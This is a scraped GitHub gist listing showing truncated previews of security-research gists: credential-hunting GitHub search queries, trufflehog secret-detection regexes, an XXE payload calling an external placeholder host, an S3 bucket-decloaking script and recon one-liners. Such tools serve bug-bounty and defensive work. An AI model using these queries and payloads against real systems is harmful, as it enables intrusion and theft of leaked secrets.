Michael Skelton codingo
codingo
/ grab_plugins.py
Created
April 1, 2020 10:58
— forked from random-robbie/grab_plugins.py
Grab all Plugins for drupal via drupal gitlab.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| session = requests.Session() | |
| http_proxy = "http://192.168.1.130:8085" | |
| proxyDict = { | |
| "http" : http_proxy, | |
| "https" : http_proxy, |
codingo
/ short-wordlist.txt
Created
January 5, 2020 11:34
— forked from tomnomnom/short-wordlist.txt
short-wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
codingo
/ auto_git_query
Created
August 28, 2019 22:30
— forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
codingo
/ trufflehog.json
Created
July 15, 2019 05:12
— forked from tehryanx/trufflehog.json
High signal patterns from trufflehog refactored to work with tomnomnom's gf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "flags": "-HnriE", | |
| "patterns": [ | |
| "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})", | |
| "-----BEGIN RSA PRIVATE KEY-----", | |
| "-----BEGIN DSA PRIVATE KEY-----", | |
| "-----BEGIN EC PRIVATE KEY-----", | |
| "-----BEGIN PGP PRIVATE KEY BLOCK-----", | |
| "AKIA[0-9A-Z]{16}", | |
| "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", |
codingo
/ foxyproxy.json
Created
June 3, 2019 05:27
— forked from liamosaur/foxyproxy.json
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "mode": "patterns", | |
| "proxySettings": [ | |
| { | |
| "address": "127.0.0.1", | |
| "port": 8080, | |
| "username": "", | |
| "password": "", | |
| "type": 1, | |
| "title": "127.0.0.1:8080", |
codingo
/ hrefs.py
Created
December 4, 2018 00:30
— forked from bayotop/hrefs.py
Identify "href" usages in SPAs (ReactJS), i.e., free javascript: XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| import sys | |
| VULNERABLE_HREF = r'href: [^"].+[^\s;,]' | |
| STATE_VALUES = r'\.setState\({([\s\S]*?)}\)' | |
| #false_positives = ("this.props.team.", "constants.") | |
| def find_state_candidates(name, states): | |
| candidates = [] |
codingo
/ XXE_payloads
Created
August 21, 2018 23:39
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
codingo
/ bucket-disclose.sh
Created
July 14, 2018 14:36
— forked from fransr/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
codingo
/ linkfinder-oneliner.sh
Created
June 15, 2018 14:04
— forked from ntrzz/linkfinder-oneliner.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > jslinks.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < jslinks.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf jslinks.txt |
codingo
/ monitor_cve.py
Created
February 26, 2018 10:01
— forked from PaulSec/monitor_cve.py
Monitors @cvenew and sends me a message on Telegram if a keyword triggers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from tweepy import StreamListener | |
| from tweepy import Stream | |
| import tweepy | |
| import json | |
| import telebot | |
| import requests | |
| CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX' | |
| CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX' | |
| ACCESS_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX' |
NewerOlder